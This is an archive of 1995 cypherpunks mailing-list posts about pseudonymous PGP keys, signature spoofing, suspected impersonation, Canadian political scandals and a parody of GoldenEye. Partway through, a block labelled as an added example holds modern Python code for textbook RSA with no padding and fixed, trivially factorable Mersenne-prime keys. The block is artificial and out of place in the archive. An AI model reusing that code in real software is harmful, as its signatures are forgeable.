> > sense of helplessness at the character assassination I've suffered at his
> > hands, that I feel that I must take some token action to "set the
> > record straight".  Something which clears my name.
> > 
> > Here is the TRUE unedited story for the list which Deitweiler felt he
> > had to TWIST to the nth degree.  His attempt at making mountains out
> > of mole hills will not succeed with this one.
> 
> This story truly is a non-starter.  Big deal.  It really has no
> relevance to this international list.  This is simply a Canadian matter.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: SINCLAIR  DOUGLAS N <sinclai@ecf.toronto.edu>
Date: Sun, 19 Nov 1995 09:01:13 +0800
To: perry@piermont.com
Subject: [NOISE] LD is Canadian?
In-Reply-To: <199511182351.SAA00184@jekyll.piermont.com>
Message-ID: <95Nov18.194403edt.330@cannon.ecf.toronto.edu>
MIME-Version: 1.0
Content-Type: text/plain


> I hope everyone realizes that Detweiler is probably arguing with
> himself, three levels deep. I must admit that the levels he stoops to
> in order to draw attention to himself are pathetic. Why don't you just
> stick to posting as Vlad Nurzi? It's more dignified.

Appealing as the idea is, some of these posts have shown a good understanding
of Canadian politics and current events.  I think it unlikely that LD could
have written all of them.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Sun, 19 Nov 1995 09:07:51 +0800
To: cypherpunks@toad.com
Subject: negative reputation (was: WRITTEN CODE)
Message-ID: <199511190053.TAA21421@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

- -----BEGIN PGP SIGNED MESSAGE-----

Daniel 'genius' Charpentier <drcharpe@hamlet.uncg.edu> wrote:

> he mentioned his desire to see more cryptographic program code and
> I didn't want to see this initiative die.  I am a newcomer to
> cryptography and I know I shouldn't be posting yet but that is
> what I thought cypherpunk postings was supposed to be in the first
> place ( program code, protocols, and algorithms ).  Please don't
> flame me too badly for this message.  I am doing everything I am
> supposed to before posting ( reading the FAQ's, the entire
> cypherpunk archive, and APPLIED CRYPTOGRAPHY by Bruce Schneier )

It sounds like you are afraid of getting a negative reputation.
Well don't be.  Simply create a persistent pseudonym and sign your
messages with it instead.  That way, if it turns out that everyone
disagrees with you and/or flames you to death, you can simply
discard your old pseudonym.  Otherwise you keep your pseudonym and 
continue to post under it.  This technique is not new, so you may 
already have seen it in the archive.

Logically, a pseudonym is simply a public key.  However you may want
to give it a human-readable name so other people may more easily refer 
to it.  If you decide to do this, I suggest that you do not name the key 
on its first post because there is a high probability that you will decide 
to discard the key.  If you name it and throw it away, then you have
unnecessarily cluttered up the limited name space.

 - a new entity, as yet unnamed

- -----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMK5/P42Fr67QcvwZAQGVdwP5AaE5MR8JztPBv1k/0GdVlZSzuBBMboRW
d7Ofyw2EloKS7YTgb+ZoGDT92h+n5Yzpp5Jb5+0zm8iDLQbm0RTQJxE86Ty4DrO4
5w1CUCSa8VF4mTVoRvyaYrWHTq4uxOj4LAPC6Zxx5qIPUSRgceWoYsmEoarIYYLU
FEhnF34o5m0=
=T80R
- -----END PGP SIGNATURE-----

- -----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQCNAzCuftgAAAEEAL35udZ/l0s590SjtzSM9eAepxAGe9Mp38ZoTsvfmNQh008W
sLtiYKmSYKBPuuRZIpYBZEjLZry5p6xHUpsKuflNXy7sdeHBviU+x8J57ip4DLx2
+tlv4dtjLKxzVGEqEfWOb3oRHCJ1t2IgV5A9RBzp2SXke56pTo2Fr67QcvwZAAUT
tBxhIG5ldyBlbnRpdHksIGFzIHlldCB1bm5hbWVk
=h9Uo
- -----END PGP PUBLIC KEY BLOCK-----
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMK5/9SoZzwIn1bdtAQFS0wF+NyWTvLIZr05q8O4LOCgM0W1lHKBy+iu3
P3k3Yy7+FIS15erO88CDpwIBbywqQ+Pa
=wJn0
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@c2.org>
Date: Sun, 19 Nov 1995 12:37:53 +0800
To: s1113645@tesla.cc.uottawa.ca
Subject: Re: Design proposal: crypto-capable generic interface
In-Reply-To: <Pine.3.89.9511181615.A21921-0100000@tesla.cc.uottawa.ca>
Message-ID: <199511190419.UAA15156@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


s1113645@tesla.cc.uottawa.ca wrote:
> MOSS?

MIME Object Security Services. It's a technically superior alternative
to PGP, but one with an uncertain future. It's not being actively
developed by anyone other than TIS, and their TISMOSS prototype
implementation is far from being generally usable.

For more information on the standard, see RFC 1848:
      http://ds.internic.net/rfc/rfc1848.txt

For more information on the TIS effort, see:
      http://www.tis.com/docs/Research/moss.html

Raph




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Sun, 19 Nov 1995 10:34:15 +0800
To: cypherpunks@toad.com
Subject: Anderson on SSL
Message-ID: <iBiseD41w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


One of the mags I get for free is called _OEM_. It recently ran an interview
with Marc Andreessen from Netscape. I'll key in a few crypto-relevant passages.

...

Q. Everyone's looking for ways to make money on the World Wide Web. What is the
future for advertisers on the Web?

A. Advertisements in an interactive medium definitely function best as a
service; really, the line between advertising, informational marketing and
direct sales blurs incredibly quickly. I expect a lot of creativity to be
devoted to pulling people into commercial sites and keeping them there,
including continuing sponsorship of innovative content.

Q. Do you see many small transactions as a possible model for making money on
the Web?

A. Tiny transactions will be a part of the grand scheme of things. They'll make
possible the 2-cent joke of the day and lots of appropriate forms of content.

Q. How will people deal with getting costs down for each transaction to eke out
a profit?

A. That's the challenge for the companies that intend to make money processing
tiny transactions. I can't wait to see who does it first.

Q. Now that the InterNIC has started to charge for domain names, do you, as an
Internaut, miss the anarchistic, "anything goes" community the Net once was?

A. The Internet was never really anarchistic and "anything goes". It was always
a cooperative venture that everyone derived benefit from. That's pretty much
the case.

In fact, I still get a thrill -- more now than ever -- when I go through
directories like Yahoo. There's much more out there on the Net now. Everything
is accelerating.

...

Q. Do you think that the Netscape's Secure Sockets Layer (SSL) is the de facto
standard for Internet security now?

A. SSL is a de facto standard, widely adopted throughout the industry by
Microsoft, Novell, Apple, IBM, Sun, Digital Equipment, Intel, MasterCard, Visa,
etc. The security space is a very broad space, though, and SSL solves a
specifically defined set of problems: encryption and authentication for a
secure data channel over TCP/IP.

There are many other problems yet to solve. Other protocols will play a role in
solving those problems, and we will support them.

Q. What happened to the deal with Enterprise Integration Technologies and its
Secure Hypertext Protocol (S-HTTP), which was Netscape's only real competition
in the area of secure server software?

A. Early this year, we announced that Netscape (along with IBM/Prodigy, America
Online and Compuserve) became an investor and partner in Terisa Systems, which
was previously a joint venture of EIT and RSA Data Security. All parties agreed
to support both SSL and S-HTTP.

Unfortunately, Terisa has been unable to ship its toolkit, so things haven't
gone as well as we had all hoped. In the meantime, virtually everyone is
supporting SSL [but not S-HTTP].

Q. Do you think that your server software, and especially your protocol Secure
Courier, will lessen the public perception that credit-card entries aren't safe
on the Net?

A. I think it's happening. We're in the middle of a broad shift in consumer
behavior, and there will be a lot of exciting things happening over the next
few years as a result. Things are definitely warming up right now.

Of course, one of the great things about doing business on the Net is that it's
a lot cheaper for the merchant than doing business in the "real" world. One of
the broad trends we're starting to see is that a lot of entrepreneurial
companies will be coming up on the Net. They, more than anyone, will help drive
the shift in consumer behavior by offering innovative goods and services and
innovative ways.

...

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Sun, 19 Nov 1995 12:52:55 +0800
To: cypherpunks@toad.com
Subject: Re: (CANADIAN PRESS REPORTS)
Message-ID: <199511190440.UAA01341@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 18 Nov 1995, jim bell wrote:

> >anonymous writes:
> >> I still feel such a sense of violation with what LD did, such an
> >> utter sense of helplessness at the character assassination I've
> >> suffered at his hands, 
> >
> >So use PGP, sign your messages.  Simple solution.
> 
> Absolutely!  Anybody who uses anonymous remailers to post to public areas,
> and does not use digital signatures to prevent spoofing when it is obviously
> needed, is a fool or worse.

Most people believe THAT a digital signature is evidence that I am who my
signature _says_ I am when it really doesn't do that at all.  It isn't
reliable at all. 

Unfortunately, I've learned the hard way NOT to do that.  Digital 
signatures don't prevent spoofing.

In fact, I think that thinking something is secure when it isn't leads 
to even more trouble, and could even lead to many tragedies.

In a nutshell, here's the problem.

If someone takes my pgp secret keyring and my password, then they can 
sign a message *digitally* so that people believe the spoofed message is 
really from me.  In fact, since most people tend to rely on a pgp message 
far more than a non-pgp message, most people would be absolutely 
convinced that the message was in fact from me.

Signing with PGP is just not a solution.



Alice de 'nonymous ...

                                  ...just another one of those...


P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sun, 19 Nov 1995 14:19:30 +0800
To: cypherpunks@toad.com
Subject: Re: negative reputation (was: WRITTEN CODE)
Message-ID: <199511190558.VAA11128@ix6.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 07:53 PM 11/18/95 -0500, a new entity, as yet unnamed wrote:
>Logically, a pseudonym is simply a public key.  However you may want
>to give it a human-readable name so other people may more easily refer 
>to it.  If you decide to do this, I suggest that you do not name the key 
>on its first post because there is a high probability that you will decide 
>to discard the key.  If you name it and throw it away, then you have
>unnecessarily cluttered up the limited name space.
>
> - a new entity, as yet unnamed

Here's the new entity's key, signed :-)  I haven't added it to the
PGP key servers; I'll leave that up to you...

#--
#				Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0663 Pager/Voicemail 1-408-787-1281






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Sun, 19 Nov 1995 11:29:05 +0800
To: davidm@iconz.co.nz
Subject: Re: Anonymity and Intellectual Capital
Message-ID: <v02120d03acd44a063fd4@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain



>I suggest that arbitration is well suited to
>pseudonymous commerce, and  propose the use of an old device - the
>unincorporated, or deed of settlement, company.


First of all, this is a damn fine post. Outstanding!

The first thing that strikes me about all this is how time seems to be
"unwinding" as far as centralization of power, or anything else, is
concerned.

I've ranted about all this here and elsewhere, how falling semiconductor
prices, public networks and strong cryptography beget the reemergence of
bearer certificates, this time in digital form (of which ecash is only the
prima facie example, the existence proof) and what I call, for lack of a
better term, a "geodesic", instead of hierarchical, economy.

We're seeing in this "unincorporated company" idea the devolution, the
surfacting, of concentrations of information, and thus power, back out to
individuals, and with that, responsibility, and of course, freedom.

Truly marvelous. Hope there's more where that one came from.

Cheers,
Bob Hettinga





-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA (617) 958-3971
"Reality is not optional." --Thomas Sowell
The e$ Home Page: http://www.webstuff.apple.com/~vinnie/Rah
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Sun, 19 Nov 1995 14:22:37 +0800
To: cypherpunks@toad.com
Subject: Re: CANADIAN PRESS REPORTS (was Re: CSE gets flak on TV)
Message-ID: <199511190612.WAA15057@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Alice here (the real one) ...

On Sat, 18 Nov 1995, Perry E. Metzger wrote:

> I hope everyone realizes that Detweiler is probably arguing with
> himself, three levels deep. I must admit that the levels he stoops to
> in order to draw attention to himself are pathetic. Why don't you just
> stick to posting as Vlad Nurzi? It's more dignified.

Detweiler certainly is getting around ... but I'm beginning to have
my doubts whether it is Detweiler who is spoofing me.  

And Detweiler might be Vlad Nurzi or whoever, but it seems that
whoever is spoofing me -- whether it is Detweiler or not -- is privy
to certain "facts" ... verifiable facts ... some of which are very
worrisome.

And it's not just whatever news is breaking over the wire.

anonymous-remailer@shell.portal.com writes:
> > 
> > Here is the TRUE unedited story for the list which Detweiler felt he
> > had to TWIST to the nth degree.  His attempt at making mountains out
> > of mole hills will not succeed with this one.
> 
> This story truly is a non-starter.  Big deal.  It really has no
> relevance to this international list.  This is simply a Canadian matter.

I take this last comment back.  It was premature.  I think that this
is in fact very relevant to this list.  And it's not just a Canadian
matter.

My little spoofing-shadow, Mr. Mystery-Writer, seems to not only have
a juvenile sense of humour, but seems to have a handle on some pretty
sensitive information.  

His information isn't limited to how Canada was able to outbid the 
United States on a wheat deal with China, but his information 
encompasses matters of an order of greater significance, especially
when Mr. Mystery-Writer wrote: 

> And that's the fleshed out version of the story.
>
> I'm just sorry that our Prime Minister is in such a bad position because 
> of the timing of this "Jane Shorten's" revelations.  She also revealed 
> that Canada spied on Japan.
> 
> To think ... Canadian Prime Minister Chretien is a guest of the Japanese
> people today.  Talk about some awkward moments.  I mean, what on earth do
> you talk about?? 
> 
> George Bush and Sushi??

Whoever it was who wrote this, they took a real swipe at a former
President of the United States.  This is very, very serious.  Joking
about Japanese / American relations is very black humour and is one
thing, but taking an open swipe at a former American President is
grossly inappropriate and was completely another, I thought.

But, ironically, Mr. Mystery-Writer had incredible foreshadowing
skills.

> Let's see ... over the last couple of days, we've had one provincial
> Premier resign over "BingoGate" -- kickbacks from bingo games, another
> premier is under some pretty heavy fire for some insider trading in a
> company he promoted in Hong Kong, (actually his wife got stock she never
> had to pay for), while Canada in conjunction with the normally very
> neutral Swiss have frozen accounts pertaining to about $20 million or so
> in kickbacks from Airbus Industries to a "senior Canadian politician".
>
> And all these stories ... coincidentally ... broke back to back.

This to me was the kicker ... especially in light of news which just
broke tonight.  Mr. Mystery-Writer was trying to throw a clue.
And boy, what a clue it was.

It wasn't the former President of the United States that he was
speaking of ... it was the former Prime Minister of Canada.

It was reported today that former Canadian Prime Minister Brian
Mulroney has launched a $50 Million pre-emptive lawsuit against the
Royal Canadian Mounted Police and the Canadian Department of Justice
for their possible future allegation or possible future charge of
taking kickbacks from Airbus Industries while the former Prime
Minister held public office.

This is one heck of a newsflash ... especially considering the
co-operation of the normally secretive and discreet authorities in
Switzerland.

Can you imagine if former President George Bush had in fact launched a
$50 Million pre-emptive lawsuit against the Federal Bureau of
Investigation and the Department of Justice, because they were
investigating him for something??  

Or if George Bush tried to stop a news story through libel chill?

My shadow was right (even if he did announce before the wires did),
Canadian politicians are beginning to drop like flies.  

Let the "Jane Shorten" Film-Fest begin.  Can you pass the popcorn?



Alice de 'nonymous ...

                                  ...just another one of those...


P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s1113645@tesla.cc.uottawa.ca
Date: Sun, 19 Nov 1995 12:06:51 +0800
To: davidm@iconz.co.nz
Subject: Re: Anonymity and Intellectual Capital
In-Reply-To: <pnr598536982o@iconz.co.nz>
Message-ID: <Pine.3.89.9511182108.B25524-0100000@tesla.cc.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain




On Sat, 18 Nov 1995, David Murray wrote:

> To pick up on a couple of Professor Post's ideas - limited liability of
> untraceable pseudonyms, and choice of rule sets in cyberspace (see Post,
> "Anarchy, State, and the Internet: An Essay on Law-Making in Cyberspace"
> 1995 J Online Law art 3), I suggest that arbitration is well suited to
Great! Where? (damn I should keep my older posts for a bit longer)

> pseudonymous commerce, and  propose the use of an old device - the 
> unincorporated, or deed of settlement, company.

Interesting. I just read that Liechtenstein allows anonymous corporations
(as in you register for it anonymously). I'm curious to know how this 
works (if I've got it right). It might also become rather interesting 
when one enterprising tax haven permits registration for these things 
online (and hopefully automatically, for the proper anon fee).

Barring escrow services, I don't see how contracts (or a lot of 
other laws) could be enforced against these entities when they can simply pop 
in and out of existence (unless they have some physical counterpart, like 
a storefront and merchandise. But then these are easily linkable to True 
Names, unlike software companies, financial services or any other part of 
the info economy.)

The value of a reputation is not particularly high in lots of cases or is 
occasionally worth throwing over for a big one-time scam. (Pyramid scams
for "reputable" banks)
While I'd love to set one up, I would never do any risky commerce with one.

Besides, if companies in general can set up other companies, in a 
trustworthy and non-anon jurisdiction, couldn't these foreign anon companies 
do the same in the present system and therefore make it very hard to know 
if any company in any country is non-anon? Are there any present legal 
barriers against this? 

I don't know much about the requirements of incorporation or the natures
of various types of corporations, so please feel free to correct me.
I'm not completely sure I understood your explanation of a 
deed-of-settlement corp. and the idea of an "unincorporated" company. 
(Unincorporated in what way, and what were the registration and ID 
requirements?)

Any references? Thanks.

Ps. I know I could probably look this up, but exactly what are bearer bonds?
I frequently hear them mentioned when market anonymity and money laundering 
come up.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Mon, 20 Nov 1995 20:53:43 +0800
To: Ray Cromwell <cypherpunks@toad.com
Subject: Re: "Junk E-Mail"
Message-ID: <199511200542.VAA04645@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 06:47 PM 11/19/95 -0500, Ray Cromwell wrote:
>
>  Is anyone else getting lots of junk e-mail lately?

Yes.

When people spam usenet, they get hit by a large highly organized 
counter attack.  When they spam people by email, no large
counter attack -- we need a place where people go to share 
knowledge of email abuse.

 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nowhere@bsu-cs.bsu.edu>
Date: Sun, 19 Nov 1995 12:20:59 +0800
To: cypherpunks@toad.com
Subject: .Sig Heilarchy
Message-ID: <199511190403.XAA28059@bsu-cs.bsu.edu>
MIME-Version: 1.0
Content-Type: text/plain




.SIG HEILARCHY REVEALED


>Logically, a pseudonym is simply a public key.  However you may want
>to give it a human-readable name so other people may more easily refer 
>to it.  If you decide to do this, I suggest that you do not name the key 
>on its first post because there is a high probability that you will decide 
>to discard the key.  If you name it and throw it away, then you have
>unnecessarily cluttered up the limited name space.
>
> - a new entity, as yet unnamed

"Cluttering up the namespace" is a growing problem. Fortunately, the InterNIC has taken on the important task of registering pseudonyms, and will coordinate the issuance of new pseudonyms with the Postal Service.

[The issuance of these items is temporarily on hold due to the Government Shutdown (tm).]

The fee for this will likely be quite reasonable, in the $300/year range, consistent with SAIC's plans for other emerging markets.

The InterNIC also sees great promise in collecting fees for .sig blocks, tentatively priced at $10 per line per year. As SAIC Chairman Bobby Ray Inman points out, this is the easiest way to control the proliferation of long .sig blocks.

--Klaus! von Future Prime, a Sanctioned Pseudonym

[.sig removed by order of the InterNIC .Sig Heilarchy until Herr von Future Prime sends us his past due amount]





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jimbell@pacifier.com (jim bell)
Date: Sun, 19 Nov 1995 14:55:42 +0800
To: cypherpunks@toad.com
Subject: Re: (CANADIAN PRESS REPORTS)
Message-ID: <m0tH33n-00091vC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


Detweiler wrote...

>On Sat, 18 Nov 1995, jim bell wrote:
>
>> >anonymous writes:
>> >> I still feel such a sense of violation with what LD did, such an
>> >> utter sense of helplessness at the character assassination I've
>> >> suffered at his hands, 
>> >
>> >So use PGP, sign your messages.  Simple solution.
>> 
>> Absolutely!  Anybody who uses anonymous remailers to post to public areas,
>> and does not use digital signatures to prevent spoofing when it is obviously
>> needed, is a fool or worse.
>
>Most people believe THAT a digital signature is evidence that I am who my
>signature _says_ I am when it really doesn't do that at all.  It isn't
>reliable at all. 
>
>Unfortunately, I've learned the hard way NOT to do that.  Digital 
>signatures don't prevent spoofing.
>
>In fact, I think that thinking something is secure when it isn't leads 
>to even more trouble, and could even lead to many tragedies.
>
>In a nutshell, here's the problem.
>

WARNING!  WARNING!  WARNING!  BIG "IF" COMING UP!  BIG "IF" COMING UP!!!


>If someone takes my pgp secret keyring and my password, then they can 
 ^^

>sign a message *digitally* so that people believe the spoofed message is 
>really from me.  In fact, since most people tend to rely on a pgp message 
>far more than a non-pgp message, most people would be absolutely 
>convinced that the message was in fact from me.

Pardon me, but what was the point of that last comment?  It is an obvious
statement of fact that yes, IF IF IF somebody had a secret key AND password,
he could duplicate a signature.  

Digital signatures allow a person to exclude others from being able to sign
messages as if they are from him.  True, a person could simply publish his
secret key and password, at which point everyone could sign notes as if they
came from him, but that wouldn't be "interesting" because most people would
have no reason to do so.

>Signing with PGP is just not a solution.

It is, apparently, in the vast majority of possible situations.  Why would
you even try to disagree?

Oh, yes, I forgot... you're Detweiler.


 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: James Black <black@eng.usf.edu>
Date: Sun, 19 Nov 1995 13:15:27 +0800
To: anonymous-remailer@shell.portal.com
Subject: Re: (CANADIAN PRESS REPORTS)
In-Reply-To: <199511190440.UAA01341@jobe.shell.portal.com>
Message-ID: <Pine.SUN.3.91.951118235430.9209A-100000@kinks>
MIME-Version: 1.0
Content-Type: text/plain


Hello,

On Sat, 18 Nov 1995 anonymous-remailer@shell.portal.com wrote:

> On Sat, 18 Nov 1995, jim bell wrote:
> 
> Most people believe THAT a digital signature is evidence that I am who my
> signature _says_ I am when it really doesn't do that at all.  It isn't
> reliable at all. 
> 
> Unfortunately, I've learned the hard way NOT to do that.  Digital 
> signatures don't prevent spoofing.
> 
> In fact, I think that thinking something is secure when it isn't leads 
> to even more trouble, and could even lead to many tragedies.
> 
> In a nutshell, here's the problem.
> 
> If someone takes my pgp secret keyring and my password, then they can 
> sign a message *digitally* so that people believe the spoofed message is 
> really from me.  In fact, since most people tend to rely on a pgp message 
> far more than a non-pgp message, most people would be absolutely 
> convinced that the message was in fact from me.
> 
> Signing with PGP is just not a solution.

  I am planning on changing pine (a mail program on the Unix) to use PGP 
and RIPEM directly, and this is one of the issues I am dealing with.  The 
fact is that if you let someone get your secret keyring and password then 
that is your problem, as both should be secure, esp your password.
  What I am hoping to do is just have every message that is to be signed 
to be signed with the thumbprint (hash?) of the message, and this will be 
put at the bottom of each message, every time, so that it protects from 
any messages being changed, and verifies who sent the message.
  Again we go back to the fact that the weakest link here is *you* not 
PGP.
  Take care and have fun.  BTW: Once I am done this version of Pine will 
be export controlled it sounds like. :(

James Black
black@suntan.eng.usf.edu
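
The hash-then-sign scheme and the stolen-key objection argued in this thread, as an added example that is not part of any original post. It uses textbook RSA with no padding and constructed keys built from Mersenne primes (trivially factorable, illustration only); `key_id` here is this example's own SHA-256 fingerprint, not PGP's key ID format.

```python
import hashlib

E = 65537  # conventional RSA public exponent


def make_key(p, q):
    """Build a textbook RSA key pair from two primes (toy: no padding)."""
    n = p * q
    d = pow(E, -1, (p - 1) * (q - 1))  # private exponent (Python 3.8+)
    return {"n": n, "e": E, "d": d}


def public_half(key):
    """The part of the key that is published and that a pseudonym 'is'."""
    return {"n": key["n"], "e": key["e"]}


def key_id(pub):
    """Short handle for a public key (hypothetical format for this example)."""
    raw = pub["n"].to_bytes((pub["n"].bit_length() + 7) // 8, "big")
    return hashlib.sha256(raw).hexdigest()[:8].upper()


def digest(message):
    """The 'thumbprint' of the message: SHA-256 read as an integer."""
    return int.from_bytes(hashlib.sha256(message).digest(), "big")


def sign(message, key):
    """Sign the hash of the message with the private exponent."""
    return pow(digest(message), key["d"], key["n"])


def verify(message, signature, pub):
    """True only if the signature was made over this exact message
    by a holder of the private half of `pub`."""
    return pow(signature, pub["e"], pub["n"]) == digest(message)


# Constructed keys. Mersenne primes keep the example short and offline;
# real keys use random primes and a padding scheme.
ALICE = make_key(2**521 - 1, 2**607 - 1)
MALLORY = make_key(2**1279 - 1, 2**2203 - 1)
ALICE_PUB = public_half(ALICE)


def run_scenarios():
    """Run the cases the thread argues about; returns {case: verify result}."""
    post = b"Alice here (the real one) ..."        # constructed sample text
    forged = b"Alice here ... ignore my earlier post"
    sig = sign(post, ALICE)

    return {
        # 1. Untouched post, checked against Alice's published key.
        "genuine": verify(post, sig, ALICE_PUB),
        # 2. Same signature attached to altered text: the hash no longer matches.
        "tampered": verify(forged, sig, ALICE_PUB),
        # 3. Spoofer signs with a key of their own: fails against Alice's key.
        "impostor_own_key": verify(forged, sign(forged, MALLORY), ALICE_PUB),
        # 4. Spoofer holds a copy of Alice's secret key: verification succeeds.
        #    The signature shows possession of the key, not who typed the post.
        "stolen_key": verify(forged, sign(forged, ALICE), ALICE_PUB),
    }


if __name__ == "__main__":
    print("pseudonym key id:", key_id(ALICE_PUB))
    for case, ok in run_scenarios().items():
        print(f"{case:18s} -> {'valid' if ok else 'INVALID'}")
```

Cases 2 and 3 are what signing does prevent; case 4 is why protecting the secret keyring and passphrase remains the signer's job.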




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Don M. Kitchen" <don@wero.byu.edu>
Date: Sun, 19 Nov 1995 17:23:13 +0800
To: cypherpunks@toad.com
Subject: [NOISE] REWRITE! : GoldenEye
In-Reply-To: <199511180406.XAA18908@bb.hks.net>
Message-ID: <ML-2.0.816771664.7349.don@wero.byu.edu>
MIME-Version: 1.0
Content-Type: text/plain


> Just got back from the new Pierce-Brosnan-as-007 flick.
> It had a few typical "hacker" stereotypes, and a couple
> of interesting crypto relevant references.

Here's the cypherpunk rewrite of the movie... 

> * Boris, the stereotypical hacker, was hacking through American
> banks.  A screen had the words "Department of Justice" and the
> DoJ logo; underneath were the words "Clipper Chip" and a list
> of banks.

...bought the clipper codes from some guy at the DOJ for $100.
(gets a discount rate - normal rate is $200)

> * The archvillain's plan involved a massive money transfer and
> an EMP pulse; he very briefly explained the effects of what
> would happen if every computer in London were rendered non-
> functional.  Possible crypto-anarchy bits.

No need.

All the banks are using DES, which has suddenly become strong again.
(only for another 10 years, of course)

> * Boris should learn the value of strong passphrases.  His
> password for the massive mainframe which will be used in the
> archvillain's scheme is a five-letter dictionary word, which
> didn't change (and it was used on two different computers),
> and he revealed it indirectly (it was a word puzzle).

..hacked the account from some guy in Microsloth network security,
who doesn't know yet that anyone else is using it.

> * A few on-computer-screen references to "encryption".
> 
> * Boris and the mastermind kept bantering about "breaking codes."

It really is annoying to try to break 40bit keys realtime. Why couldn't
they have been only 32 bits or something...

> * Boris' computer in Russia - in his apartment - has a domain
> ending in ".comp.math.edu"; when his screen lights up with
> the words "INCOMING EMAIL" he goes into a live chat (complete
> with graphics).

Using Weidei's TCP tunneler to submarine his computer so that it
_REALLY_IS_ under that domain. (After all, someone would probably
suspect kgb.com or UofHack.edu.ussr domains)

Re chat with graphics: isn't X great?! Have to remember to hack
into a T3 though, this lag is really slowing the feed down... Makes
the movie longer, ya know. Plus, techies will get a thrill if movie
shows doom being played remotely.

There you have it. Suitable for any cryptoanarchists' night out.

Don


PS: Anyone know about ML, the IMAP mail program? Just installed the
new version at home and noticed I haven't seen the PGP hooks in the
configuration like I did on earlier versions. Hmmmmmmmmmmmmmmmmmmm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Sun, 19 Nov 1995 18:31:58 +0800
To: cypherpunks@toad.com
Subject: reputations: discussions and meta-discussions
Message-ID: <199511191017.CAA27805@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Sat, 18 Nov 1995, Bill Stewart wrote:
 
> Here's the new entity's key, signed :-)  I haven't added it to the
> PGP key servers; I'll leave that up to you...

As we know, a public key certificate is a binding between the key and
some attribute, as asserted by the signer.  In this case you have asserted
a binding between my key and the string "a new entity, as yet unnamed".
I don't understand why you did this.  Would you please explain?

The only reason I can think of is that you wanted to provide evidence
for the key's creation date by timestamping it.  If that was the case,
I thank you.  But in the future, to avoid confusion, perhaps you can 
create a new ID "timestamp" for the key and sign that instead.

 -------------

On a different subject, given the likelihood of an increasing number 
of new identities showing up on this list, I propose that we create 
a new mailing list (cypherpunks-reputations) devoted to
the discussion of reputations of cypherpunks participants.  A significant
number of posts on cypherpunks are already discussions of this sort.  I
believe it would be benificial to create a seperate channel for these
meta-discussions so they do not interfere with regular cypherpunk topics.

By encouraging discussions about reputations of specific entities, we
may also gain some insight on the general properties of reputation systems.
In this sense by creating this new list we create an interesting
self-referential loop -- cypherpunks-reputations contains meta-discussions
about cypherpunks, which in turn contains meta-discussions about 
cypherpunks-reputations.

Examples of posts appropriate for this new mailing list would include:
* knowledge, intelligence, style and quirks of cypherpunks participants
* exchange of keys and certificates
* speculation on connections between entities
* kill file entry recommendations

I do not have the physical resources to serve such a mailing list, so
I hope someone who does will volunteer.

 - keyid D072FC19 (still unnamed)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMK8CnY2Fr67QcvwZAQGUJgP9G8ER/qH8OKvSbOtPYwaDQMkVyKFWafxH
Ukbm0lKgCwS97cEKufxJH49VCRkxrd+t+ia5IRNDxewB1xlcjAKRvp4MK8Ps6MTy
FbhmEpfhB4pnfE5l+e8VnZSoD79j0Sv6C80C48NL6NJNV6PhhTS9B5lXxW/qJv9D
3ZTpTf5AjZI=
=e4DU
-----END PGP SIGNATURE-----




